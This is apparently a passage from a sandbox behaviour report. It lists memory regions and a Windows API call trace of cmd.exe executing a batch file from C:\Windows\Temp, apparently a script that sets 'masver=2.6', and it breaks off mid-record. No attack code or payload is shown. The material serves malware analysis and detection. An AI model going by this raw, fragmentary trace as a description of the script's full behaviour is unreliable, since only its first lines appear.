0x7ffbe7811a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 358 start_va = 0x7ffbe86c0000 end_va = 0x7ffbe86d2fff monitored = 0 entry_point = 0x7ffbe86c2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 359 start_va = 0x7ffbe9d90000 end_va = 0x7ffbe9de5fff monitored = 0 entry_point = 0x7ffbe9da0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 360 start_va = 0x1f05ad80000 end_va = 0x1f05ad86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001f05ad80000" filename = "" Region: id = 361 start_va = 0x1f05c540000 end_va = 0x1f05c540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05c540000" filename = "" Region: id = 362 start_va = 0x1f05c550000 end_va = 0x1f05c554fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 363 start_va = 0x1f05d280000 end_va = 0x1f05d280fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 364 start_va = 0x1f05d290000 end_va = 0x1f05d294fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05d290000" filename = "" Region: id = 365 start_va = 0x1f05d2a0000 end_va = 0x1f05d2a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05d2a0000" filename = "" Region: id = 366 start_va = 0x7ffbdf2a0000 end_va = 0x7ffbdf513fff monitored = 0 entry_point = 0x7ffbdf310400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 367 start_va = 0x1f05d2b0000 end_va = 0x1f05d2b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 368 start_va = 0x1f05d2c0000 end_va = 0x1f05d2c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001f05d2c0000" filename = "" Thread: id = 2 os_tid = 0x1290 Thread: id = 3 os_tid = 0x128c Thread: id = 4 os_tid = 0x127c Thread: id = 5 os_tid = 0x12bc Thread: id = 6 os_tid = 0x12a4 Thread: id = 7 os_tid = 0x129c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2e555000" os_pid = "0x9e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x12c4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Windows\\Temp\\MAS_15344413.cmd\" \"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 875 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 876 start_va = 0x43f9c00000 end_va = 0x43f9dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000043f9c00000" filename = "" Region: id = 877 start_va = 0x43f9e00000 end_va = 0x43f9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000043f9e00000" filename = "" Region: id = 878 start_va = 0x19a8f0c0000 end_va = 0x19a8f0dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f0c0000" filename = "" Region: id = 879 start_va = 0x19a8f0e0000 end_va = 0x19a8f0f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019a8f0e0000" filename = "" Region: id = 880 start_va = 0x19a8f100000 end_va = 0x19a8f103fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019a8f100000" filename = "" Region: id = 881 start_va = 0x19a8f110000 end_va = 0x19a8f110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019a8f110000" filename = "" Region: id = 882 start_va = 0x19a8f120000 end_va = 0x19a8f121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f120000" filename = "" Region: id = 883 start_va = 0x7df5fff10000 end_va = 0x7ff5fff0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff10000" filename = "" Region: id = 884 start_va = 0x7ff7bd500000 end_va = 0x7ff7bd522fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd500000" filename = "" Region: id = 885 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 886 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 888 start_va = 0x19a8f130000 end_va = 0x19a8f2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f130000" filename = "" Region: id = 889 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 890 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 891 start_va = 0x19a8f0c0000 end_va = 0x19a8f0cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019a8f0c0000" filename = "" Region: id = 892 start_va = 0x7ff7bd400000 end_va = 0x7ff7bd4fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd400000" filename = "" Region: id = 893 start_va = 0x19a8f2e0000 end_va = 0x19a8f39dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 977 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 978 start_va = 0x43f9f00000 end_va = 0x43f9ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000043f9f00000" filename = "" Region: id = 979 start_va = 0x19a8f3a0000 end_va = 0x19a8f53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f3a0000" filename = "" Region: id = 980 start_va = 0x19a8f0d0000 end_va = 0x19a8f0d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f0d0000" filename = "" Region: id = 981 start_va = 0x19a8f130000 end_va = 0x19a8f136fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f130000" filename = "" Region: id = 982 start_va = 0x19a8f1e0000 end_va = 0x19a8f2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f1e0000" filename = "" Region: id = 983 start_va = 0x7ffbe28b0000 end_va = 0x7ffbe28b9fff monitored = 0 entry_point = 0x7ffbe28b14a0 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\System32\\cmdext.dll" (normalized: "c:\\windows\\system32\\cmdext.dll") Region: id = 984 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 985 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 986 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 987 start_va = 0x19a8f140000 end_va = 0x19a8f14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019a8f140000" filename = "" Region: id = 989 start_va = 0x19a8f540000 end_va = 0x19a8f876fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1080 start_va = 0x19a8f150000 end_va = 0x19a8f170fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Thread: id = 33 os_tid = 0xd84 [0174.232] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0174.232] GetProcessHeap () returned 0x19a8f1e0000 [0174.232] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ec5f0 [0174.232] GetProcessHeap () returned 0x19a8f1e0000 [0174.234] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec5f0) returned 1 [0174.236] _wcsicmp (_String1="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"", _String2=")") returned -7 [0174.236] _wcsicmp (_String1="FOR", _String2="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"") returned 68 [0174.236] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"") returned 68 [0174.236] _wcsicmp (_String1="IF", _String2="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"") returned 71 [0174.236] _wcsicmp (_String1="IF/?", _String2="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"") returned 71 [0174.236] _wcsicmp (_String1="REM", _String2="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"") returned 80 [0174.236] _wcsicmp (_String1="REM/?", _String2="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"") returned 80 [0174.236] GetProcessHeap () returned 0x19a8f1e0000 [0174.236] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e1070 [0174.237] GetProcessHeap () returned 0x19a8f1e0000 [0174.237] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1e1130 [0174.237] GetProcessHeap () returned 0x19a8f1e0000 [0174.237] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e0800 [0174.238] GetConsoleTitleW (in: lpConsoleTitle=0x43f9eff490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.238] GetFileAttributesW (lpFileName="\"C:\\Windows\\Temp\\MAS_15344413.cmd\"" (normalized: "c:\\windows\\system32\\\"c:\\windows\\temp\\mas_15344413.cmd\"")) returned 0xffffffff [0174.239] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0174.239] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0174.239] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0174.239] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0174.239] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0174.239] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0174.239] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0174.239] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0174.239] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0174.239] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0174.239] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0174.239] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0174.239] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0174.239] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0174.239] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0174.239] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0174.239] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0174.239] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0174.239] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0174.239] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0174.239] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0174.240] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0174.240] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0174.240] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0174.240] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0174.240] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0174.240] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0174.240] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0174.240] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0174.240] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0174.240] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0174.240] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0174.240] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0174.240] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0174.240] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0174.240] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0174.240] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0174.240] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0174.240] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0174.240] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0174.240] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0174.240] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0174.240] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0174.241] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0174.241] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0174.241] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0174.241] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0174.241] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0174.241] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0174.241] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0174.241] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0174.241] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0174.241] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0174.241] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0174.241] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0174.241] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0174.241] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0174.241] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0174.241] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0174.241] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0174.241] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0174.241] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0174.241] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0174.241] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0174.241] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0174.241] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0174.241] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0174.241] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0174.241] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0174.241] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0174.242] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0174.242] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0174.242] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0174.242] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0174.242] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0174.242] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0174.242] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0174.242] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0174.242] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0174.242] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0174.242] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0174.242] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0174.242] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0174.242] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0174.242] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0174.242] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0174.242] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0174.242] GetProcessHeap () returned 0x19a8f1e0000 [0174.242] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1e7920 [0174.242] GetProcessHeap () returned 0x19a8f1e0000 [0174.242] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x5e) returned 0x19a8f1e1190 [0174.243] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0174.243] GetProcessHeap () returned 0x19a8f1e0000 [0174.243] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1e7b40 [0174.243] SetErrorMode (uMode=0x0) returned 0x0 [0174.243] SetErrorMode (uMode=0x1) returned 0x0 [0174.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\.", nBufferLength=0x208, lpBuffer=0x19a8f1e7b50, lpFilePart=0x43f9efed30 | out: lpBuffer="C:\\Windows\\Temp", lpFilePart=0x43f9efed30*="Temp") returned 0xf [0174.243] SetErrorMode (uMode=0x0) returned 0x1 [0174.244] GetProcessHeap () returned 0x19a8f1e0000 [0174.244] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e7b40, Size=0x52) returned 0x19a8f1e7b40 [0174.244] GetProcessHeap () returned 0x19a8f1e0000 [0174.244] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e7b40) returned 0x52 [0174.244] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\Temp\\.") returned 1 [0174.244] GetProcessHeap () returned 0x19a8f1e0000 [0174.244] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x36) returned 0x19a8f1e0af0 [0174.244] GetProcessHeap () returned 0x19a8f1e0000 [0174.244] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1e1200 [0174.244] GetProcessHeap () returned 0x19a8f1e0000 [0174.244] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e1200, Size=0x36) returned 0x19a8f1e1200 [0174.244] GetProcessHeap () returned 0x19a8f1e0000 [0174.244] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e1200) returned 0x36 [0174.244] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0174.244] GetProcessHeap () returned 0x19a8f1e0000 [0174.244] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1e7bb0 [0174.249] GetProcessHeap () returned 0x19a8f1e0000 [0174.249] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e7bb0, Size=0x88) returned 0x19a8f1e7bb0 [0174.250] GetProcessHeap () returned 0x19a8f1e0000 [0174.250] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e7bb0) returned 0x88 [0174.250] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.250] FindFirstFileExW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), fInfoLevelId=0x1, lpFindFileData=0x43f9efeab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efeab0) returned 0x19a8f1e1260 [0174.250] GetProcessHeap () returned 0x19a8f1e0000 [0174.250] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, Size=0x28) returned 0x19a8f1e6bb0 [0174.250] FindClose (in: hFindFile=0x19a8f1e1260 | out: hFindFile=0x19a8f1e1260) returned 1 [0174.251] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0174.251] GetConsoleTitleW (in: lpConsoleTitle=0x43f9eff010, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.252] GetProcessHeap () returned 0x19a8f1e0000 [0174.252] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e8) returned 0x19a8f1e7c50 [0174.252] ApiSetQueryApiSetPresence () returned 0x0 [0174.252] ResolveDelayLoadedAPI () returned 0x7ffbe28b1010 [0174.260] SaferWorker () returned 0x0 [0174.362] SetErrorMode (uMode=0x0) returned 0x0 [0174.362] SetErrorMode (uMode=0x1) returned 0x0 [0174.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x104, lpBuffer=0x19a8f1e7930, lpFilePart=0x43f9efee30 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x43f9efee30*="MAS_15344413.cmd") returned 0x20 [0174.362] SetErrorMode (uMode=0x0) returned 0x1 [0174.362] GetProcessHeap () returned 0x19a8f1e0000 [0174.362] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x56) returned 0x19a8f1f8dc0 [0174.362] wcsspn (_String=" ", _Control=" \x09") returned 0x3 [0174.362] GetProcessHeap () returned 0x19a8f1e0000 [0174.362] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1e58d0 [0174.362] GetProcessHeap () returned 0x19a8f1e0000 [0174.362] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1e58f0 [0174.362] GetProcessHeap () returned 0x19a8f1e0000 [0174.362] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e58f0, Size=0x14) returned 0x19a8f1e5910 [0174.362] GetProcessHeap () returned 0x19a8f1e0000 [0174.362] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5910) returned 0x14 [0174.362] CmdBatNotificationStub () returned 0x0 [0174.363] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.363] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.363] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.363] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0174.363] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.363] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0174.363] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.365] SetFilePointer (in: hFile=0x88, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0174.365] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@:: 15344413 \r\n", cbMultiByte=15, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="@:: 15344413 \r\n") returned 15 [0174.365] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.365] GetFileType (hFile=0x88) returned 0x1 [0174.365] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.366] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0174.366] GetProcessHeap () returned 0x19a8f1e0000 [0174.366] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1ec5f0 [0174.366] GetProcessHeap () returned 0x19a8f1e0000 [0174.367] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec5f0) returned 1 [0174.367] GetProcessHeap () returned 0x19a8f1e0000 [0174.367] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5c30 [0174.369] _tell (_FileHandle=3) returned 15 [0174.369] _close (_FileHandle=3) returned 0 [0174.369] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.370] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.370] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.370] SetFilePointer (in: hFile=0x88, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0174.370] GetProcessHeap () returned 0x19a8f1e0000 [0174.371] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5c30) returned 1 [0174.371] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.371] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0174.371] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.371] SetFilePointer (in: hFile=0x88, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0174.371] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@set masver=2.6\r\n", cbMultiByte=17, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="@set masver=2.6\r\n") returned 17 [0174.372] 